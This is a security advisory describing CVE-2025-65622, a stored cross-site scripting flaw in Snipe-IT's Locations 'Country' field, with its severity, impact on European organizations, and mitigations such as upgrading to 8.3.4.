CVE-2025-65622 is a stored cross-site scripting (XSS) vulnerability identified in the open-source asset management software Snipe-IT, affecting versions prior to 8.3.4. The vulnerability arises from insufficient sanitization of user input in the 'Country' field within the Locations module. A low-privileged authenticated user can exploit this flaw by injecting malicious JavaScript code into this field. When other users access the affected page or data, the injected script executes within their browser context, potentially allowing the attacker to hijack sessions, steal cookies, perform actions on behalf of the victim, or conduct further attacks such as phishing or privilege escalation. The vulnerability requires the attacker to have an authenticated account and for victims to interact with the maliciously crafted content, limiting the attack surface. The CVSS 3.1 base score of 5.4 reflects a medium severity, considering the network attack vector, low complexity, required privileges, and user interaction. The scope is changed (S:C), indicating that the vulnerability affects resources beyond the initially vulnerable component. No known exploits are currently reported in the wild, but the presence of this vulnerability in a widely used asset management platform poses a tangible risk, especially in environments where multiple users access the system regularly. The CWE-79 classification confirms this as a classic stored XSS issue, emphasizing the need for proper input validation and output encoding to prevent script injection.

For European organizations, the impact of CVE-2025-65622 can be significant, particularly for those relying on Snipe-IT for managing IT assets and inventory. Successful exploitation could lead to unauthorized access to user sessions, enabling attackers to impersonate legitimate users and potentially manipulate asset data or gain further foothold within the network. This undermines the confidentiality and integrity of the asset management system, potentially disrupting operational workflows and leading to data breaches. While availability is not directly impacted, the trustworthiness of the system is compromised. Organizations in sectors with stringent data protection requirements, such as finance, healthcare, and government, may face regulatory and reputational consequences if this vulnerability is exploited. The requirement for authentication and user interaction reduces the likelihood of widespread automated attacks but does not eliminate targeted exploitation risks, especially in environments with many users or where user privileges are not tightly controlled.

To mitigate CVE-2025-65622, European organizations should immediately upgrade Snipe-IT to version 8.3.4 or later, where the vulnerability has been addressed. In environments where immediate patching is not feasible, implement strict input validation on the 'Country' field to reject or sanitize potentially malicious input. Employ robust output encoding techniques to ensure that any user-supplied data rendered in the browser does not execute as code. Additionally, enforce the principle of least privilege by limiting user permissions to only what is necessary, reducing the risk posed by low-privileged users. Implement Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts. Monitor logs and user activities for unusual behavior that may indicate exploitation attempts. Educate users about the risks of interacting with suspicious content within the application. Finally, conduct regular security assessments and code reviews focusing on input handling and XSS vulnerabilities to prevent similar issues.